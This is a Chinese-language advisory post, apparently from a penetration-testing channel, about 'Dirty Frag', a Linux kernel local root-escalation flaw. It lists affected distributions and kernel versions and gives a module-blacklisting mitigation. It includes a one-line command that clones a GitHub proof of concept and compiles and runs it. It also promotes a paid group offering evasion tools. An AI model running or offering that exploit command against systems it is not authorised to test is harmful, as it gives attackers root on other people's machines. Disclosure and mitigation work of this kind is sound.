文章总结： 文档披露Linux内核高危本地提权0day漏洞DirtyFrag，攻击者可稳定获取root权限且无需竞争条件。影响范围涵盖Ubuntu、RHEL等主流发行版近9年版本，提供GitHubPoC链接及通过禁用esp4/esp6/rxrpc模块的临时修复方案，同时强调该工具仅限合法安全研究使用。 综合评分： 72 文章分类： 漏洞分析,渗透测试,红队,漏洞预警,安全工具

Linux LPE通用提权 0day目前没有漏洞编号

渗透测试 渗透测试

渗透测试

2026年5月8日 10:31 日本

在小说阅读器读本章

去阅读

点击上方蓝字关注【渗透测试】不迷路

介绍：

漏洞名称：Dirty Frag

发现时间：2026年5月7日

严重程度：高危（Critical）

风险描述：本地未授权用户可稳定实现权限提升（LPE）至 root 权限，成功率极高，无需竞争条件，且失败不会引发内核崩溃（panic）。

官方仓库 & PoC：

https://github.com/V4bel/dirtyfrag

验证方式

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

或者

git clone https://github.com/V4bel/dirtyfrag.gitcd dirtyfraggcc -O0 -Wall -o exp exp.c -lutil && ./exp

该 PoC 是在与 Linux 发行版协商后提供准确信息。不要在你未被授权测试的系统上使用它。

受影响版本

Ubuntu 24.04.4: 6.17.0-23-genericRHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64openSUSE Tumbleweed: 7.0.2-1-defaultCentOS Stream 10: 6.12.0-224.el10.x86_64AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64Fedora 44: 6.19.14-300.fc44.x86_64...

frm-ESP 页面缓存写入漏洞的影响范围始于提交 cac2661c53f3（2017年1月17日），RxRPC 页面缓存写入漏洞的影响范围始于提交 2dc334f1a63a（2023年6月），两者均持续影响至当前最新上游版本。

换言之，该漏洞在代码中存在时间总计约9年。

修复方法：

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

🎁POC获取方式

👇关注公众号，后台回复关键词 ” 0508 “获取工具👇

如果你对网络安全、漏洞研究或工具开发感兴趣，欢迎一起交流！

星球介绍

自研工具、二开工具、免杀工具、漏洞复现、教程等资源、漏洞挖掘分析、网络安全相关资料分享。

严正声明：本工具仅用于合法的安全研究及教学。用户必须对自身行为负责，严格遵守法律。任何将工具用于违法犯罪的行为均被严格禁止，由此工具产生的全部法律责任问题均由用户自行承担一切后果，开发者概不负责。

✅AiScan-N 使用反馈

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：渗透测试 渗透测试 渗透测试《Linux LPE通用提权 0day目前没有漏洞编号》